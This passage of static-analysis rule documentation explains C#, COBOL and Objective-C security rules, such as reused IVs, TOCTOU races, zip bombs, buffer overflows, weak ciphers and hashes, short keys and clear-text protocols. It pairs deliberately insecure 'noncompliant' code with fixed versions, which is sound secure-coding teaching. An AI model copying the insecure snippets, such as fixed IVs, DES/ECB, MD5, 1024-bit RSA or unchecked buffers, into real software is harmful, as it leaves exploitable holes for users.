  3. Version Control Issues: Storing passwords in code can lead to version control issues. If the code is shared or stored in a version control system, the password will be visible to anyone with access to the repository, which is a security risk.

To mitigate these risks, it is recommended to use secure methods for storing and retrieving passwords, such as using environment variables, configuration files, or secure key management systems. These methods allow for better security, flexibility, and separation of sensitive information from the codebase.

Resources

Standards

csharpsquid:S3329

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In the mode Cipher Block Chaining (CBC), each block is used as cryptographic input for the next block. For this reason, the first block requires an initialization vector (IV), also called a "starting variable" (SV).

If the same IV is used for multiple encryption sessions or messages, each new encryption of the same plaintext input would always produce the same ciphertext output. This may allow an attacker to detect patterns in the ciphertext.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, a company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in .NET

Code examples

Noncompliant code example

using System.IO;
using System.Security.Cryptography;

public void Encrypt(byte[] key, byte[] dataToEncrypt, MemoryStream target)
{
    var aes = new AesCryptoServiceProvider();

    byte[] iv     = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
    var encryptor = aes.CreateEncryptor(key, iv); // Noncompliant

    var cryptoStream = new CryptoStream(target, encryptor, CryptoStreamMode.Write);
    var swEncrypt    = new StreamWriter(cryptoStream);

    swEncrypt.Write(dataToEncrypt);
}

Compliant solution

In this example, the code implicitly uses a number generator that is considered strong, thanks to aes.IV.

using System.IO;
using System.Security.Cryptography;

public void Encrypt(byte[] key, byte[] dataToEncrypt, MemoryStream target)
{
    var aes = new AesCryptoServiceProvider();

    var encryptor = aes.CreateEncryptor(key, aes.IV);

    var cryptoStream = new CryptoStream(target, encryptor, CryptoStreamMode.Write);
    var swEncrypt    = new StreamWriter(cryptoStream);

    swEncrypt.Write(dataToEncrypt);
}

How does this work?

Use unique IVs

To ensure high security, initialization vectors must meet two important criteria:

  • IVs must be unique for each encryption operation.
  • For CBC and CFB modes, a secure FIPS-compliant random number generator should be used to generate unpredictable IVs.

The IV does not need be secret, so the IV or information sufficient to determine the IV may be transmitted along with the ciphertext.

In the previous non-compliant example, the problem is not that the IV is hard-coded.
It is that the same IV is used for multiple encryption attempts.

Resources

Standards

cobol:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers

WITH DEBUGGING MODE activates all debug lines (ones with 'D' or 'd' in the indicator area). This clause should not be used in production.

Sensitive Code Example

SOURCE-COMPUTER. IBM-370 WITH DEBUGGING MODE.

Compliant Solution

SOURCE-COMPUTER. IBM-370.

See

cobol:SQL.SelectWithNoWhereClauseCheck

Although the WHERE condition is optional in a SELECT statement, for performance and security reasons, a WHERE clause should always be specified to prevent reading the whole table.

Ask Yourself Whether

  • The whole table is not required.
  • The table contains sensitive information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Add a "WHERE" condition to "SELECT" statements.

Sensitive Code Example

SELECT * FROM db_persons INTO us_persons

Compliant Solution

SELECT * FROM db_persons INTO us_persons WHERE country IS 'US'

Exceptions

Not having a WHERE clause is acceptable in read-only cursors as results are generally sorted and it is possible to stop processing in the middle.

cobol:SQL.DynamicSqlCheck

It is a bad practice to use Dynamic SQL. It differs from static embedded SQL in that part or all of the actual SQL commands may be stored in a host variable that is built on the fly during execution of the program. In the extreme case, the SQL commands are generated in their entirety by the application program at run time. While dynamic SQL is more flexible than static embedded SQL, it does require additional overhead and is much more difficult to understand and to maintain.

Moreover, dynamic SQL may expose the application to SQL injection vulnerabilities.

This rule raises an issue when PREPARE or EXECUTE IMMEDIATE is used.

Ask Yourself Whether

  • The SQL statement can be written without dynamic clauses.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not use dynamic clauses in "SELECT" statements.

Sensitive Code Example

EXEC SQL PREPARE SEL INTO :SQLDA FROM :STMTBUF END-EXEC.

Compliant Solution

EXEC SQL SELECT * FROM tableName END-EXEC.

See

cobol:S1686

Why is this an issue?

Defining a subprogram to be called at runtime is possible but ill-advised. This extremely powerful feature can quite easily be misused, and even when used correctly, it highly increases the overall complexity of the program, and makes it impossible before runtime to know exactly what will be executed. Therefore defining the subprogram to be called at runtime is a feature that should be avoided.

Noncompliant code example

MOVE SOMETHING TO MY_SUBPROG.
...
CALL MY_SUBPROG.

Compliant solution

01 MY_SUBPROG PIC X(10) VALUE "SUB123".
....
CALL MY_SUBPROG.
cobol:S1685

This rule is deprecated; use S4507 instead.

Why is this an issue?

Debug statements (ones with 'D' or 'd' in the indicator area) should not be executed in production, but the WITH DEBUGGING MODE clause activates all debug lines, which could expose sensitive information to attackers. Therefore the WITH DEBUGGING MODE clause should be removed.

Noncompliant code example

SOURCE-COMPUTER. IBM-370 WITH DEBUGGING MODE.

Compliant solution

SOURCE-COMPUTER. IBM-370.

Resources

cobol:COBOL.DisplayStatementUsageCheck

Why is this an issue?

The DISPLAY statement outputs data to standard out or some other destination and could reveal sensitive information. Therefore, it should be avoided.

Noncompliant code example

DISPLAY "hello world"  *> Noncompliant

Resources

objc:S5982

The purpose of changing the current working directory is to modify the base path when the process performs relative path resolutions. When the working directory cannot be changed, the process keeps the directory previously defined as the active working directory. Thus, verifying the success of chdir() type of functions is important to prevent unintended relative paths and unauthorized access.

Ask Yourself Whether

  • The success of changing the working directory is relevant for the application.
  • Changing the working directory is required by chroot to make the new root effective.
  • Subsequent disk operations are using relative paths.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

After changing the current working directory verify the success of the operation and handle errors.

Sensitive Code Example

The chdir operation could fail and the process still has access to unauthorized resources. The return code should be verified:

const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

int fd = open(any_dir, O_RDONLY | O_DIRECTORY);
fchdir(fd); // Sensitive: missing check of the return value

Compliant Solution

Verify the return code of chdir and handle errors:

const char* root_dir = "/jail/";
if (chdir(root_dir) == -1) {
  exit(-1);
} // Compliant

int fd = open(any_dir, O_RDONLY | O_DIRECTORY);
if(fchdir(fd) == -1) {
  exit(-1);
} // Compliant

See

objc:S5832

Why is this an issue?

Pluggable authentication module (PAM) is a mechanism used on many unix variants to provide a unified way to authenticate users, independently of the underlying authentication scheme.

When authenticating users, it is strongly recommended to check the validity of the account (not locked, not expired …​), otherwise it leads to unauthorized access to resources.

Noncompliant code example

The account validity is not checked with pam_acct_mgmt when authenticating a user with pam_authenticate:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) { // Noncompliant - missing pam_acct_mgmt
        return -1;
    }

    return 0;
}

The return value of pam_acct_mgmt is not checked:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    pam_acct_mgmt(pamh, 0); // Noncompliant
    return 0;
}

Compliant solution

When authenticating a user with pam_authenticate, check the account validity with pam_acct_mgmt:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    if (pam_acct_mgmt(pamh, 0) != PAM_SUCCESS) { // Compliant
        return -1;
    }
    return 0;
}

Resources

objc:S5847

Why is this an issue?

"Time Of Check to Time Of Use" (TOCTOU) vulnerabilities occur when an application:

  • First, checks permissions or attributes of a file: for instance, is a file a symbolic link?
  • Next, performs some operations such as writing data to this file.

The application cannot assume the state of the file is unchanged between these two steps, there is a race condition (ie: two different processes can access and modify the same shared object/file at the same time, which can lead to privilege escalation, denial of service and other unexpected results).

For instance, attackers can benefit from this situation by creating a symbolic link to a sensitive file directly after the first step (eg in Unix: /etc/passwd) and try to elevate their privileges (eg: if the written data has the correct /etc/passwd file format).

To avoid TOCTOU vulnerabilities, one possible solution is to do a single atomic operation for the "check" and "use" actions, therefore removing the race condition window. Another possibility is to use file descriptors. This way the binding of the file descriptor to the file cannot be changed by a concurrent process.

Noncompliant code example

A "check function" (for instance access, stat …​ in this case access to verify the existence of a file) is used, followed by a "use function" (open, fopen …​) to write data inside a non existing file. These two consecutive calls create a TOCTOU race condition:

#include <stdio.h>

void fopen_with_toctou(const char *file) {
  if (access(file, F_OK) == -1 && errno == ENOENT) {
    // the file doesn't exist
    // it is now created in order to write some data inside
    FILE *f = fopen(file, "w"); // Noncompliant: a race condition window exist from access() call to fopen() call calls
    if (NULL == f) {
      /* Handle error */
    }

    if (fclose(f) == EOF) {
      /* Handle error */
    }
  }
}

Compliant solution

If the file already exists on the disk, fopen with x mode will fail:

#include <stdio.h>

void open_without_toctou(const char *file) {
  FILE *f = fopen(file, "wx"); // Compliant
  if (NULL == f) {
    /* Handle error */
  }
  /* Write to file */
  if (fclose(f) == EOF) {
    /* Handle error */
  }
}

A more generic solution is to use "file descriptors":

void open_without_toctou(const char *file) {
  int fd = open(file, O_CREAT | O_EXCL | O_WRONLY);
  if (-1 != fd) {
    FILE *f = fdopen(fd, "w");  // Compliant
  }
}

Resources

objc:S5849

Setting capabilities can lead to privilege escalation.

Linux capabilities allow you to assign narrow slices of root's permissions to files or processes. A thread with capabilities bypasses the normal kernel security checks to execute high-privilege actions such as mounting a device to a directory, without requiring (additional) root privileges.

Ask Yourself Whether

Capabilities are granted:

  • To a process that does not require all capabilities to do its job.
  • To a not trusted process.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Capabilities are high privileges, traditionally associated with superuser (root), thus make sure that the most restrictive and necessary capabilities are assigned to files and processes.

Sensitive Code Example

When setting capabilities:

cap_t caps = cap_init();
cap_value_t cap_list[2];
cap_list[0] = CAP_FOWNER;
cap_list[1] = CAP_CHOWN;
cap_set_flag(caps, CAP_PERMITTED, 2, cap_list, CAP_SET);

cap_set_file("file", caps); // Sensitive
cap_set_fd(fd, caps); // Sensitive
cap_set_proc(caps); // Sensitive
capsetp(pid, caps); // Sensitive
capset(hdrp, datap); // Sensitive: is discouraged to be used because it is a system call

When setting SUID/SGID attributes:

chmod("file", S_ISUID|S_ISGID); // Sensitive
fchmod(fd, S_ISUID|S_ISGID); // Sensitive

See

objc:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will compress irrelevant data (eg: a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in particular it’s not recommended to recursively expand archives (an entry of an archive could be also an archive).

Sensitive Code Example

#include <archive.h>
#include <archive_entry.h>
// ...

void f(const char *filename, int flags) {
  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);

  if ((archive_read_open_filename(a, filename, 10240))) {
    return;
  }

  for (;;) {
    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      return;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);
}

Compliant Solution

#include <archive.h>
#include <archive_entry.h>
// ...

int f(const char *filename, int flags) {
  const int max_number_of_extraced_entries = 1000;
  const int64_t max_file_size = 1000000000; // 1 GB

  int number_of_extraced_entries = 0;
  int64_t total_file_size = 0;

  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);
  int status = 0;

  if ((archive_read_open_filename(a, filename, 10240))) {
    return -1;
  }

  for (;;) {
    number_of_extraced_entries++;
    if (number_of_extraced_entries > max_number_of_extraced_entries) {
      status = 1;
      break;
    }

    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      status = -1;
      break;
    }

    int file_size = archive_entry_size(entry);
    total_file_size += file_size;
    if (total_file_size > max_file_size) {
      status = 1;
      break;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);

  return status;
}

See

objc:S6069

When using sprintf , it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

Ask Yourself Whether

  • if the provided buffer is large enough for the result of any possible call to the sprintf function (including all possible format strings and all possible additional arguments).

There is a risk if you answered no to the above question.

Recommended Secure Coding Practices

There are fundamentally safer alternatives. snprintf is one of them. It takes the size of the buffer as an additional argument, preventing the function from overflowing the buffer.

  • Use snprintf instead of sprintf. The slight performance overhead can be afforded in a vast majority of projects.
  • Check the buffer size passed to snprintf.

If you are working in C++, other safe alternative exist:

  • std::string should be the prefered type to store strings
  • You can format to a string using std::ostringstream
  • Since C++20, std::format is also available to format strings

Sensitive Code Example

sprintf(str, "%s", message);   // Sensitive: `str` buffer size is not checked and it is vulnerable to overflows

Compliant Solution

snprintf(str, sizeof(str), "%s", message); // Prevent overflows by enforcing a maximum size for `str` buffer

Exceptions

It is a very common and acceptable pattern to compute the required size of the buffer with a call to snprintf with the same arguments into an empty buffer (this will fail, but return the necessary size), then to call sprintf as the bound check is not needed anymore. Note that 1 needs to be added by the size reported by snprintf to account for the terminal null character.

size_t buflen = snprintf(0, 0, "%s", message);
char* buf = malloc(buflen + 1); // For the final 0
sprintf(buf, "%s", message);{code}

See

objc:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("DES/CBC/PKCS7", Botan::ENCRYPTION); // Noncompliant
}

Compliant solution

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Documentation

Standards

objc:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/ECB", Botan::ENCRYPTION); // Noncompliant
}

Example with an asymmetric cipher, RSA:

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "PKCS1v15"); // Noncompliant
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "OAEP");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

objc:S5782

Why is this an issue?

Array overruns and buffer overflows happen when memory access accidentally goes beyond the boundary of the allocated array or buffer. These overreaching accesses cause some of the most damaging, and hard to track defects.

When the buffer overflow happens while reading a buffer, it can expose sensitive data that happens to be located next to the buffer in memory. When it happens while writing a buffer, it can be used to inject code or to wipe out sensitive memory.

This rule detects when a POSIX function takes one argument that is a buffer and another one that represents the size of the buffer, but the two arguments do not match.

Noncompliant code example

char array[10];
initialize(array);
void *pos = memchr(array, '@', 42); // Noncompliant, buffer overflow that could expose sensitive data

Compliant solution

char array[10];
initialize(array);
void *pos = memchr(array, '@', 10);

Exceptions

Functions related to sockets using the type socklen_t are not checked. This is because these functions are using a C-style polymorphic pattern using union. It relies on a mismatch between allocated memory and sizes of structures and it creates false positives.

Resources

objc:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Botan

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 1024); // Noncompliant
}

Here is an example with the generation of a key as part of a Discrete Logarithmic (DL) group, a Digital Signature Algorithm (DSA) parameter:

#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/1024"); // Noncompliant
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp160k1"); // Noncompliant
}

Compliant solution

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 2048);
}
#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/2048");
}
#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp224k1");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms are mentioned directly in their names. For example, secp256k1 generates a 256-bits long private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterpart.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

objc:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the functions rely on a pseudorandom number generator, they should not be used for security-critical applications or for protecting sensitive data.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use functions which rely on a strong random number generator such as randombytes_uniform() or randombytes_buf() from libsodium, or randomize() from Botan.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

#include <random>
// ...

void f() {
  int random_int = std::rand(); // Sensitive
}

Compliant Solution

#include <sodium.h>
#include <botan/system_rng.h>
// ...

void f() {
  char random_chars[10];
  randombytes_buf(random_chars, 10); // Compliant
  uint32_t random_int = randombytes_uniform(10); // Compliant

  uint8_t random_chars[10];
  Botan::System_RNG system;
  system.randomize(random_chars, 10); // Compliant
}

See

objc:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("MD5")); // Sensitive
    return hash->process(input);
}

Compliant Solution

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("SHA-512")); // Compliant
    return hash->process(input);
}

See

objc:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
